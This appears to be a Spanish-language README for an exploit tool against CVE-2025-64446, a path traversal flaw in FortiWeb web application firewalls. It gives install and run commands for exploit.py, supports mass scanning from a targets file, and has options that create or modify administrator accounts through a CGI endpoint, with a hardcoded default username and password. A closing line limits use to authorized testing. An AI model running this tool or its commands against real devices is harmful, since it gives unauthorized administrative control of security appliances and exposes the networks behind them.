
Herramienta de explotación para CVE-2025-64446 path traversal en FortiWeb WAF. Admite verificación de vulnerabilidad y explotación de endpoints CGI para crear o modificar cuentas de usuario.
Herramienta de explotación para la verificación y explotación de la vulnerabilidad CVE-2025-64446 en dispositivos FortiWeb.
Esta herramienta prueba y explota una vulnerabilidad de path traversal (CVE-2025-64446) en firewalls de aplicaciones web FortiWeb. Puede usarse para verificar el estado de la vulnerabilidad o explotar el endpoint CGI para crear/modificar cuentas de usuario.
pip install -r requirements.txt
python3 exploit.py -t <target_ip> --check
python3 exploit.py -t <target_ip> --exploit
python3 exploit.py -t <target_ip> --exploit --username sxy --password sxyrxyadmin1!
python3 exploit.py -l targets.txt --check
Cree un archivo targets.txt con una dirección IP por línea:
192.168.1.100
192.168.1.101
192.168.1.102
-t, --target - Dirección IP del objetivo (requerida si no se usa --targets-file)-l, --targets-file - Archivo que contiene direcciones IP de objetivos (una por línea, requerido si no se usa --target)-p, --port - Puerto del objetivo (por defecto: 443)--http - Usar HTTP en lugar de HTTPS--check - Solo verificación de vulnerabilidad (solo lectura)--exploit - Ejecutar exploit del endpoint CGI--username - Nombre de usuario para el exploit (por defecto: sxy)--password - Contraseña a establecer (por defecto: sxyrxyadmin1!)--profname - Nombre de perfil (por defecto: prof_admin)--vdom - Nombre de VDOM (por defecto: root)--loginname - Nombre de inicio de sesión (por defecto: admin)--testpoint-name - Nombre de testpoint/usuario a crear (por defecto: Testpoint)Esta herramienta es únicamente para investigación de seguridad autorizada y fines educativos. Úsela solo en sistemas que sean de su propiedad o para los que tenga permiso explícito para realizar pruebas.